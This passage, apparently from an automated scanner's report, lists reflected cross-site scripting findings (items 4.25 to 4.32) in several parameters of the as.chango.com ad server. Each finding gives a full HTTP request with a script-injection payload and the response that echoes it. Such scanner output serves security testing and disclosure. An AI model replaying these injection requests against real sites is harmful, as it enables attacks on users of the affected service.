Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:59 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:59 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...
4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5ec"><script>alert(1)</script>1085ffe8a15 was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+joseaa5ec"><script>alert(1)</script>1085ffe8a15&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a29d24cc6e07eb15125d8d1b3ceb62291aecc91c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:05 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:05 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:05 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tball/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san joseaa5ec"><script>alert(1)</script>1085ffe8a15&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu
...[SNIP]...
4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b406f"><script>alert(1)</script>02b8bac3890 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f2ff7ee7580ca0f599186a62d9136e72ad18ae1a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:07 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:07 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemediab406f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E02b8bac3890%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:07 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
dian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae46
...[SNIP]...
4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e1e"><script>alert(1)</script>6db27d1746e was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3b9cdd9277b1c295e99fb4dc357a0b4d01f3458b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:10 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:10 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:10 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ck1=http://as.chango.com/links/click1317599950.77?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware
...[SNIP]...
4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b611"><script>alert(1)</script>1eedbcf2072 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "59a5142f96efa33ad5f002277312b5f2c31c491d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 2349
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:23 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon8b611%22%3E%3Cscript%3Ealert%281%29%3C/script%3E1eedbcf2072%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:23 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
36?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=0&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...
4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45475"><script>alert(1)</script>21ae6b0bc46 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=25045475"><script>alert(1)</script>21ae6b0bc46&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "5ba78575886bd3594b59106bc3638a8dfdeb6a66"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:26 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300px; height: 25045475"><script>alert(1)</script>21ae6b0bc46px; margin: 0; padding: 0;">
...[SNIP]...
4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd05"><script>alert(1)</script>4ccae8e57d1 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c9ad73da996eca9026305ba55d6dd77afee7681f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:28 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:28 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:28 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
//as.chango.com/links/click1317599968.42?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=
...[SNIP]...
4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b15f"><script>alert(1)</script>0aaee42b2aa was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "238ea0fb61ae84561530a6e4e50ebda879606458"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:38 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:38 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:38 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
om/links/click1317599978.28?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=
...[SNIP]...
4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4215"><script>alert(1)</script>69873abae82 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7cff87f18ac98ed42845ee33f9e6e0bf79efaf95"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:39 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:39 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:39 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
